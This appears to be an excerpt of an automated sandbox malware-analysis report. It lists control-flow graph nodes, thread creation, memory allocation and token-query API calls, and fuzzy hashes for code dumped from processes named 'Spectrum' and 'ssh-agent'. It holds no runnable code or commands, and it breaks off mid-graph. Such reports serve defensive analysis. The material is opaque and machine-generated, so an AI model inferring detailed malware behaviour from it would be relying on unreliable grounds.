                                                                                                                                                                                control_flow_graph 593 7b83e7-7b83e9 594 7b83ef 593->594 595 7b82c5-7b82c8 593->595 594->595 598 7b83f5-7b83f7 594->598 596 7b83f9 595->596 597 7b82ce 595->597 601 7b83ff 596->601 602 7b82d2-7b82d7 596->602 599 7b828f-7b8303 call 7e72ec 597->599 600 7b82d0 597->600 598->596 604 7b8306-7b8309 599->604 618 7b834f-7b8355 599->618 600->599 600->602 605 7bf524-7bf52e 601->605 602->604 608 7b830b-7b8311 CloseHandle 604->608 609 7b832e-7b8330 604->609 607 7bf807 605->607 613 7bf8df-7bf8e0 607->613 614 7bf80d 607->614 608->609 611 7b82dd-7b82e3 609->611 612 7b8332 609->612 616 7b82e9 611->616 617 7b83a3-7b83a4 611->617 612->611 615 7b8334 612->615 622 7c15a5-7c15aa 613->622 614->613 619 7bf813 614->619 615->605 616->617 621 7b82ef 616->621 617->605 624 7b8212-7b821a GetTokenInformation 618->624 625 7b8341 618->625 626 7bf81b 619->626 627 7bf78f 619->627 633 7b82f0-7b831c 621->633 628 7c15ae-7c15af 622->628 630 7b83af 624->630 631 7b8220-7b8234 624->631 625->624 629 7b8347 625->629 626->613 627->626 632 7bf795 627->632 634 7c15b2-7c15b7 628->634 636 7c1638-7c1640 629->636 637 7b834d 629->637 640 7b8251-7b8256 call 7e72f4 630->640 641 7b83b5 630->641 662 7b823a 631->662 663 7b83d7-7b83dd 631->663 632->607 657 7b8322 633->657 658 7b81e5 633->658 635 7c15ba-7c15c1 634->635 643 7c15c7-7c15d2 635->643 644 7c1750-7c17a2 call 7e72f4 635->644 646 7c170e-7c1727 636->646 647 7c1646-7c165f 636->647 637->618 653 7b825b-7b8260 640->653 641->640 642 7b83bb-7b83ca 641->642 688 7b83d0 642->688 689 7b8277-7b827a 642->689 650 7c15d4-7c15d6 643->650 651 7c1620-7c1623 643->651 646->643 654 7c172d 646->654 647->643 655 7c1665 647->655 660 7c15dc-7c15df 650->660 661 7c1670-7c1684 650->661 664 7c1625-7c1628 651->664 665 7c16a0-7c16b4 651->665 666 7b8390-7b8393 653->666 654->644 655->644 657->658 675 7b8328-7b832c 657->675 673 7b81eb 658->673 674 7b82a3-7b82a5 658->674 660->635 670 7c15e1-7c15f6 660->670 661->622 676 7c168a-7c168d 661->676 662->663 671 7b8240 662->671 663->596 664->635 672 7c162a-7c1636 664->672 667 7c16f4-7c16f5 665->667 668 7c16b6-7c16b9 665->668 677 7b8399 666->677 678 7b827e 666->678 695 7c16fe-7c170c 667->695 685 7c173a-7c173b 668->685 686 7c16bb 668->686 679 7c15fc-7c1600 670->679 680 7c16d2-7c16d7 670->680 692 7cb32e-7cb330 671->692 672->636 681 7c16dc-7c16ec 672->681 693 7b82b2-7b82bc 673->693 694 7b81f1 673->694 674->596 690 7b82ab 674->690 675->595 675->609 682 7c172f-7c1738 676->682 683 7c1693-7c1697 676->683 677->678 684 7b839f-7b83a1 677->684 678->608 687 7b8284 678->687 679->695 696 7c1606-7c1618 679->696 680->628 681->643 702 7c16f2 681->702 705 7c173f-7c1740 682->705 697 7c16bf-7c16cd 683->697 684->617 685->705 686->697 687->609 688->689 700 7b83d6 688->700 698 7b827c 689->698 699 7b8241 689->699 690->596 701 7b82b1 690->701 706 7cb300 692->706 707 7cb332-7cb337 call 7e72f4 692->707 693->595 703 7b8357-7b836f GetTokenInformation 693->703 694->693 704 7b81f7-7b828e 694->704 711 7c1744-7c1748 695->711 696->634 698->678 698->699 699->640 710 7b8376-7b837b 699->710 700->663 701->693 702->644 703->710 705->711 714 7cb2fd 706->714 715 7cb302 706->715 707->706 717 7cb339 707->717 710->633 716 7b8381 710->716 719 7cb2ff 714->719 720 7cb305 714->720 716->633 718 7b8387 716->718 717->706 721 7cb33b-7cb33f 717->721 718->666 718->689 722 7cb308-7cb315 719->722 720->722 723 7cb322-7cb32d 720->723 721->722 722->720 725 7cb317 722->725 723->692 725->714
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                • Instruction ID: d6ea867c579ad27c5b804cb8021605781ceb8ff7e06e990d4960ba0c324b38f2
                                                                                                                                                                                • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                • Instruction Fuzzy Hash: A5F0B43550C941DBCAF58B18D8407FA67A8BF51F00B6C0099C446CB122CE2CEC41E753

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:5.1%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:66
                                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                                execution_graph 3862 8f5b8f 3873 9053f0 3862->3873 3864 8f5baf 3878 8f81c0 3864->3878 3866 8f5c2c 3867 8f5c84 3885 8f5990 3867->3885 3869 8f5dcd 3869->3869 3870 8f5d56 CreateThread 3872 8f5bbc 3870->3872 3871 8f5cd4 CreateThread CloseHandle 3871->3872 3872->3866 3872->3867 3872->3870 3872->3871 3874 9053f4 3873->3874 3875 90545e VirtualAlloc 3874->3875 3877 9053f6 3874->3877 3876 905460 3875->3876 3876->3874 3877->3864 3881 8f81e5 3878->3881 3879 8f830b CloseHandle 3879->3881 3880 8f8334 3880->3872 3881->3879 3881->3880 3882 8f8357 GetTokenInformation 3881->3882 3883 8f8212 GetTokenInformation 3881->3883 3882->3881 3883->3881 3884 8f8220 3883->3884 3884->3872 3887 8f5994 wcscpy 3885->3887 3886 8f5a23 3886->3869 3887->3886 3888 8f5a8d VirtualAlloc 3887->3888 3888->3887 3903 8f58de 3904 9053f0 VirtualAlloc 3903->3904 3905 8f58f9 3904->3905 3906 8f81c0 3 API calls 3905->3906 3907 8f5907 3906->3907 3889 8f83e7 3892 8f81e5 3889->3892 3890 8f830b CloseHandle 3890->3892 3891 8f8212 GetTokenInformation 3891->3892 3895 8f8220 3891->3895 3892->3890 3892->3891 3893 8f8334 3892->3893 3894 8f8357 GetTokenInformation 3892->3894 3894->3892 3908 8f81e3 3912 8f81e5 3908->3912 3909 8f8357 GetTokenInformation 3909->3912 3910 8f830b CloseHandle 3910->3912 3911 8f8212 GetTokenInformation 3911->3912 3914 8f8220 3911->3914 3912->3909 3912->3910 3912->3911 3913 8f8334 3912->3913 3936 8f5d22 3937 8f5cd4 CreateThread CloseHandle 3936->3937 3938 8f5bbc 3936->3938 3937->3938 3938->3937 3939 8f5c2c 3938->3939 3940 8f5d56 CreateThread 3938->3940 3941 8f5c84 3938->3941 3940->3938 3942 8f5990 VirtualAlloc 3941->3942 3943 8f5dcd 3942->3943 3943->3943 3922 8f8201 3924 8f8220 3922->3924 3925 8f81e5 3922->3925 3923 8f830b CloseHandle 3923->3925 3925->3923 3926 8f8357 GetTokenInformation 3925->3926 3927 8f8334 3925->3927 3928 8f8212 GetTokenInformation 3925->3928 3926->3925 3928->3924 3928->3925 3951 8f5d50 CreateThread 3958 8f5bbc 3951->3958 3952 8f5cd4 CreateThread CloseHandle 3952->3958 3953 8f5c84 3955 8f5990 VirtualAlloc 3953->3955 3954 8f5c2c 3957 8f5dcd 3955->3957 3956 8f5d56 CreateThread 3956->3958 3957->3957 3958->3952 3958->3953 3958->3954 3958->3956

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 008F81C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 8f81c0-8f81d8 1 8f83bf-8f83ca 0->1 3 8f8277-8f827a 1->3 4 8f83d0 1->4 5 8f827c 3->5 6 8f8241 3->6 4->3 7 8f83d6 4->7 5->6 8 8f827e 5->8 9 8f8376-8f837b 6->9 10 8f8251-8f8256 call 9272f4 6->10 11 8f830b-8f8311 CloseHandle 8->11 12 8f8284 8->12 14 8f8381 9->14 15 8f82f0-8f831c 9->15 17 8f825b-8f8260 10->17 16 8f832e-8f8330 11->16 12->16 14->15 19 8f8387 14->19 28 8f81e5 15->28 29 8f8322 15->29 21 8f82dd-8f82e3 16->21 22 8f8332 16->22 20 8f8390-8f8393 17->20 19->3 19->20 20->8 26 8f8399 20->26 23 8f82e9 21->23 24 8f83a3-8f83a4 21->24 22->21 25 8f8334 22->25 23->24 30 8f82ef 23->30 31 8ff524-8ff52e 25->31 26->8 32 8f839f-8f83a1 26->32 35 8f81eb 28->35 36 8f82a3-8f82a5 28->36 29->28 33 8f8328-8f832c 29->33 30->15 34 8ff807 31->34 32->24 33->16 37 8f82c5-8f82c8 33->37 38 8ff8df-8ff8e0 34->38 39 8ff80d 34->39 42 8f82b2-8f836f GetTokenInformation 35->42 43 8f81f1 35->43 40 8f82ab 36->40 41 8f83f9 36->41 37->41 46 8f82ce 37->46 56 9015a5-9015aa 38->56 39->38 49 8ff813 39->49 40->41 50 8f82b1 40->50 47 8f83ff 41->47 48 8f82d2-8f82d7 41->48 42->9 43->42 44 8f81f7 43->44 51 8f828e 44->51 52 8f828f-8f8303 call 9272ec 46->52 53 8f82d0 46->53 47->31 54 8f8306-8f8309 48->54 57 8ff78f 49->57 58 8ff81b 49->58 50->42 51->52 52->54 66 8f834f-8f8355 52->66 53->48 53->52 54->11 54->16 60 9015ae-9015af 56->60 57->58 61 8ff795 57->61 58->38 63 9015b2-9015b7 60->63 61->34 65 9015ba-9015c1 63->65 67 901750-9017a2 call 9272f4 65->67 68 9015c7-9015d2 65->68 76 8f8212-8f821a GetTokenInformation 66->76 77 8f8341 66->77 69 901620-901623 68->69 70 9015d4-9015d6 68->70 78 9016a0-9016b4 69->78 79 901625-901628 69->79 74 901670-901684 70->74 75 9015dc-9015df 70->75 74->56 85 90168a-90168d 74->85 75->65 80 9015e1-9015f6 75->80 81 8f83af 76->81 82 8f8220-8f8234 76->82 77->76 83 8f8347 77->83 86 9016f4-9016f5 78->86 87 9016b6-9016b9 78->87 79->65 84 90162a-901636 79->84 90 9016d2-9016d7 80->90 91 9015fc-901600 80->91 81->10 93 8f83b5 81->93 111 8f823a 82->111 112 8f83d7-8f83dd 82->112 94 8f834d 83->94 95 901638-901640 83->95 84->95 96 9016dc-9016ec 84->96 97 901693-901697 85->97 98 90172f-901738 85->98 101 9016fe-90170c 86->101 88 90173a-90173b 87->88 89 9016bb 87->89 106 90173f-901740 88->106 99 9016bf-9016cd 89->99 90->60 100 901606-901618 91->100 91->101 93->10 103 8f83bb-8f83bd 93->103 94->66 104 901646-90165f 95->104 105 90170e-901727 95->105 96->68 102 9016f2 96->102 97->99 98->106 100->63 108 901744-901748 101->108 102->67 103->1 104->68 110 901665 104->110 105->68 109 90172d 105->109 106->108 109->67 110->67 111->112 113 8f8240 111->113 115 90b32e-90b330 113->115 116 90b300 115->116 117 90b332-90b337 call 9272f4 115->117 121 90b302 116->121 122 90b2fd 116->122 117->116 123 90b339 117->123 124 90b305 122->124 125 90b2ff 122->125 123->116 126 90b33b-90b33f 123->126 127 90b322-90b32d 124->127 128 90b308-90b315 124->128 125->128 126->128 127->115 128->124 130 90b317 128->130 130->122
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                                                • Instruction ID: 651a52d1c89510807028b1b8fccb50bc2ddf97b5736461186fa5c8d9344ccc50
                                                                                                                                                                                • Opcode Fuzzy Hash: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                                                • Instruction Fuzzy Hash: 73B1153051DE4DCFCB29CB2C8881239B7A6FF95314F288659D59BC72A6DE35AC028352
                                                                                                                                                                                Function 008F5B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 131 8f5b8f-8f5c20 call 9053f0 call 928358 call 910320 call 8f81c0 141 8f5c26 131->141 142 8f5cf4-8f5d08 call 9272ec 131->142 141->142 143 8f5c2c-8f5c2f 141->143 146 8f5d0e 142->146 147 8f5c87-8f5dc8 call 8f5e60 call 8f5990 142->147 146->147 149 8f5d14-8f5d18 146->149 162 8f5dcd 147->162 152 8f5daf-8f5db6 call 8f52d0 149->152 153 8f5c65 149->153 164 8f5dbc 152->164 165 8f5c30-8f5c39 152->165 155 8f5c67 153->155 156 8f5ca3 call 8f5df0 153->156 155->156 160 8f5c69-8f5c9d 155->160 170 8f5c45-8f5d6d call 911520 156->170 182 8f5c9f 160->182 183 8f5c85 160->183 162->162 167 8f5dbe 164->167 168 8f5d7d-8f5d89 164->168 177 8f5cb9-8f5cbd 165->177 178 8f5bf7 165->178 167->168 181 8f5d9b 167->181 179 8f5d8b-8f5d92 168->179 180 8f5d94 168->180 185 8f5bfd-8f5c06 170->185 193 8f5d73 170->193 186 8f5d56-8f5d5b CreateThread 177->186 187 8f5cc3 177->187 178->177 178->185 179->180 188 8f5d9c 179->188 180->143 191 8f5cb3 180->191 181->188 182->183 190 8f5ca1 182->190 183->147 195 8f5da5-8f5da8 185->195 197 8f5d1f-8f5d45 186->197 198 8f5c7e 186->198 187->186 194 8f5cc9 187->194 188->195 190->156 191->143 191->177 193->185 199 8f5d79-8f5d7b 193->199 194->186 195->152 202 8f5d47 197->202 203 8f5cd4-8f5cea CreateThread CloseHandle 197->203 198->197 200 8f5c84 198->200 199->168 200->183 202->203 203->179 205 8f5cf0-8f5d4d 203->205 205->180
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                • Instruction ID: 79dcc0af2dea6fa77f4c61e07e819c43e61650aff51716bbfc55ea7235f5f1f8
                                                                                                                                                                                • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                • Instruction Fuzzy Hash: 4641F720609F0D8FDB68A73C945D3393AD1FB99328F6801BAD307CB1A6DB648D419752
                                                                                                                                                                                Function 008F5D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 207 8f5d22-8f5d45 208 8f5d47 207->208 209 8f5cd4-8f5cea CreateThread CloseHandle 207->209 208->209 211 8f5d8b-8f5d92 209->211 212 8f5cf0-8f5d4d 209->212 214 8f5d9c 211->214 215 8f5d94 211->215 212->215 217 8f5da5-8f5db6 call 8f52d0 214->217 218 8f5c2c-8f5c2f 215->218 219 8f5cb3 215->219 230 8f5dbc 217->230 231 8f5c30-8f5c39 217->231 219->218 220 8f5cb9-8f5cbd 219->220 222 8f5d56-8f5d5b CreateThread 220->222 223 8f5cc3 220->223 228 8f5d1f-8f5d45 222->228 229 8f5c7e 222->229 223->222 226 8f5cc9 223->226 226->222 228->208 228->209 229->228 232 8f5c84-8f5dc8 call 8f5e60 call 8f5990 229->232 234 8f5dbe 230->234 235 8f5d7d-8f5d89 230->235 231->220 241 8f5bf7 231->241 250 8f5dcd 232->250 234->235 243 8f5d9b 234->243 235->211 235->215 241->220 244 8f5bfd-8f5c06 241->244 243->214 244->217 250->250
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 738052048-0
                                                                                                                                                                                • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                • Instruction ID: 7e23aee133ebb32cf12a1c059179418a4953d9bbdb778f0c7dafc1dfb9fcdc9a
                                                                                                                                                                                • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                • Instruction Fuzzy Hash: BBF0242161EF0D85DB3CA738885933A62C1F799339F740B3ED367C90E4EA248901924A
                                                                                                                                                                                Function 008F5D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 251 8f5d50-8f5d5b CreateThread 252 8f5c78 251->252 253 8f5d1f-8f5d45 252->253 254 8f5c7e 252->254 257 8f5d47 253->257 258 8f5cd4-8f5cea CreateThread CloseHandle 253->258 254->253 255 8f5c84-8f5dc8 call 8f5e60 call 8f5990 254->255 279 8f5dcd 255->279 257->258 261 8f5d8b-8f5d92 258->261 262 8f5cf0-8f5d4d 258->262 265 8f5d9c 261->265 266 8f5d94 261->266 262->266 270 8f5da5-8f5db6 call 8f52d0 265->270 271 8f5c2c-8f5c2f 266->271 272 8f5cb3 266->272 283 8f5dbc 270->283 284 8f5c30-8f5c39 270->284 272->271 274 8f5cb9-8f5cbd 272->274 277 8f5d56-8f5d5b CreateThread 274->277 278 8f5cc3 274->278 277->252 278->277 281 8f5cc9 278->281 279->279 281->277 285 8f5dbe 283->285 286 8f5d7d-8f5d89 283->286 284->274 291 8f5bf7 284->291 285->286 292 8f5d9b 285->292 286->261 286->266 291->274 293 8f5bfd-8f5c06 291->293 292->265 293->270
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 738052048-0
                                                                                                                                                                                • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction ID: afb9095fd4c6370c1fd029d84c124b6ecaaac480d0902046576d2b545f8bf5c4
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction Fuzzy Hash: 3CB0120502AF8E651025373014081380980FF46A78BB51F7C9FB3C6CD2F8000C046365
                                                                                                                                                                                Function 008F5990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 295 8f5990-8f599b 297 8f5a33-8f5a61 call 929b00 295->297 298 8f59a1 295->298 308 8f5ab4-8f5aba call 911080 297->308 309 8f5a63 297->309 298->297 300 8f59a7-8f59ab 298->300 304 8f5a59 300->304 305 8f59b1-8f59f3 call 922320 300->305 306 8f5a5b 304->306 307 8f5a25-8f5a2d 304->307 305->304 324 8f59f5-8f59fa 305->324 306->307 319 8f5a23 306->319 312 8f5a2f 307->312 313 8f5a70-8f5a7b 307->313 327 8f5a83-8f5a88 call 8f5df0 308->327 330 8f5a13 308->330 309->308 316 8f5a65 309->316 312->316 317 8f5a7d 313->317 318 8f5a16-8f5a1e call 911470 313->318 316->313 317->318 322 8f5a7f-8f5a81 317->322 332 8f5a96-8f5ac2 318->332 323 8f5a24 319->323 322->327 328 8f59fc 324->328 329 8f5a51-8f5a54 call 92233c 324->329 337 8f5a8d VirtualAlloc 327->337 328->329 334 8f59fe-8f5a02 328->334 329->304 330->327 336 8f5a15 330->336 332->323 339 8f5ac8 332->339 334->329 336->318 337->332 339->323 340 8f5ace 339->340 340->297
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1284135714-0
                                                                                                                                                                                • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction ID: 0922e31ac5e97bbb0edc32386d9f1252a2acadc95a895173d2831fbde5e8df95
                                                                                                                                                                                • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction Fuzzy Hash: 03213A2061DEBC8FC36B933854D17B52AA2F799328F6803CBD386CB192D9284D258253
                                                                                                                                                                                Function 008F8245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 342 8f8245-8f8247 343 8f824d-8f824f 342->343 344 8f82d2-8f82d7 342->344 345 8f8251-8f8260 call 9272f4 343->345 346 8f8306-8f8309 344->346 353 8f8390-8f8393 345->353 348 8f832e-8f8330 346->348 349 8f830b-8f8311 CloseHandle 346->349 351 8f82dd-8f82e3 348->351 352 8f8332 348->352 349->348 354 8f82e9 351->354 355 8f83a3-8f83a4 351->355 352->351 356 8f8334 352->356 359 8f827e 353->359 360 8f8399 353->360 354->355 357 8f82ef 354->357 358 8ff524-8ff52e 356->358 366 8f82f0-8f831c 357->366 361 8ff807 358->361 359->349 362 8f8284 359->362 360->359 363 8f839f-8f83a1 360->363 364 8ff8df-8ff8e0 361->364 365 8ff80d 361->365 362->348 363->355 370 9015a5-9015aa 364->370 365->364 367 8ff813 365->367 375 8f81e5 366->375 376 8f8322 366->376 371 8ff78f 367->371 372 8ff81b 367->372 373 9015ae-9015af 370->373 371->372 377 8ff795 371->377 372->364 378 9015b2-9015b7 373->378 380 8f81eb 375->380 381 8f82a3-8f82a5 375->381 376->375 379 8f8328-8f832c 376->379 377->361 382 9015ba-9015c1 378->382 379->348 383 8f82c5-8f82c8 379->383 386 8f82b2-8f836f GetTokenInformation 380->386 387 8f81f1 380->387 384 8f82ab 381->384 385 8f83f9 381->385 388 901750-9017a2 call 9272f4 382->388 389 9015c7-9015d2 382->389 383->385 394 8f82ce 383->394 384->385 396 8f82b1 384->396 385->344 395 8f83ff 385->395 408 8f8376-8f837b 386->408 387->386 390 8f81f7-8f828e 387->390 391 901620-901623 389->391 392 9015d4-9015d6 389->392 402 8f828f-8f8303 call 9272ec 390->402 404 9016a0-9016b4 391->404 405 901625-901628 391->405 400 901670-901684 392->400 401 9015dc-9015df 392->401 394->402 403 8f82d0 394->403 395->358 396->386 400->370 410 90168a-90168d 400->410 401->382 406 9015e1-9015f6 401->406 402->346 435 8f834f-8f8355 402->435 403->344 403->402 411 9016f4-9016f5 404->411 412 9016b6-9016b9 404->412 405->382 407 90162a-901636 405->407 415 9016d2-9016d7 406->415 416 9015fc-901600 406->416 417 901638-901640 407->417 418 9016dc-9016ec 407->418 408->366 419 8f8381 408->419 421 901693-901697 410->421 422 90172f-901738 410->422 425 9016fe-90170c 411->425 413 90173a-90173b 412->413 414 9016bb 412->414 430 90173f-901740 413->430 423 9016bf-9016cd 414->423 415->373 424 901606-901618 416->424 416->425 427 901646-90165f 417->427 428 90170e-901727 417->428 418->389 426 9016f2 418->426 419->366 429 8f8387 419->429 421->423 422->430 424->378 432 901744-901748 425->432 426->388 427->389 434 901665 427->434 428->389 433 90172d 428->433 429->353 436 8f8277-8f827a 429->436 430->432 433->388 434->388 440 8f8212-8f821a GetTokenInformation 435->440 441 8f8341 435->441 437 8f827c 436->437 438 8f8241 436->438 437->359 437->438 438->345 438->408 442 8f83af 440->442 443 8f8220-8f8234 440->443 441->440 444 8f8347 441->444 442->345 446 8f83b5 442->446 451 8f823a 443->451 452 8f83d7-8f83dd 443->452 444->417 447 8f834d 444->447 446->345 448 8f83bb-8f83ca 446->448 447->435 448->436 457 8f83d0 448->457 451->452 453 8f8240 451->453 456 90b32e-90b330 453->456 459 90b300 456->459 460 90b332-90b337 call 9272f4 456->460 457->436 458 8f83d6 457->458 464 90b302 459->464 465 90b2fd 459->465 460->459 466 90b339 460->466 467 90b305 465->467 468 90b2ff 465->468 466->459 469 90b33b-90b33f 466->469 470 90b322-90b32d 467->470 471 90b308-90b315 467->471 468->471 469->471 470->456 471->467 473 90b317 471->473 473->465
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.3347839688.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_8f0000_ssh-agent.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                • Instruction ID: 3745a690012838a8726003a5d477edd8b6c497e324f1f49a98600f88409eafa5
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                • Instruction Fuzzy Hash: E5F0CD3552DA5DCFC726873490504396BA1FF51754F6900EEE746C7663CE24EC01D752
                                                                                                                                                                                Function 008F83E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 605 8f83e7-8f83e9 606 8f83ef 605->606 607 8f82c5-8f82c8 605->607 606->607 610 8f83f5-8f83f7 606->610 608 8f82ce 607->608 609 8f83f9 607->609 611 8f828f-8f8303 call 9272ec 608->611 612 8f82d0 608->612 613 8f83ff 609->613 614 8f82d2-8f82d7 609->614 610->609 616 8f8306-8f8309 611->616 631 8f834f-8f8355 611->631 612->611 612->614 615 8ff524-8ff52e 613->615 614->616 618 8ff807 615->618 619 8f832e-8f8330 616->619 620 8f830b-8f8311 CloseHandle 616->620 622 8ff8df-8ff8e0 618->622 623 8ff80d 618->623 624 8f82dd-8f82e3 619->624 625 8f8332 619->625 620->619 635 9015a5-9015aa 622->635 623->622 629 8ff813 623->629 627 8f82e9 624->627 628 8f83a3-8f83a4 624->628 625->624 630 8f8334 625->630 627->628 632 8f82ef 627->632 636 8ff78f 629->636 637 8ff81b 629->637 630->615 638 8f8212-8f821a GetTokenInformation 631->638 639 8f8341 631->639 645 8f82f0-8f831c 632->645 640 9015ae-9015af 635->640 636->637 643 8ff795 636->643 637->622 641 8f83af 638->641 642 8f8220-8f8234 638->642 639->638 644 8f8347 639->644 646 9015b2-9015b7 640->646 648 8f83b5 641->648 649 8f8251-8f8256 call 9272f4 641->649 676 8f823a 642->676 677 8f83d7-8f83dd 642->677 643->618 650 8f834d 644->650 651 901638-901640 644->651 669 8f81e5 645->669 670 8f8322 645->670 653 9015ba-9015c1 646->653 648->649 655 8f83bb-8f83ca 648->655 663 8f825b-8f8260 649->663 650->631 656 901646-90165f 651->656 657 90170e-901727 651->657 658 901750-9017a2 call 9272f4 653->658 659 9015c7-9015d2 653->659 701 8f8277-8f827a 655->701 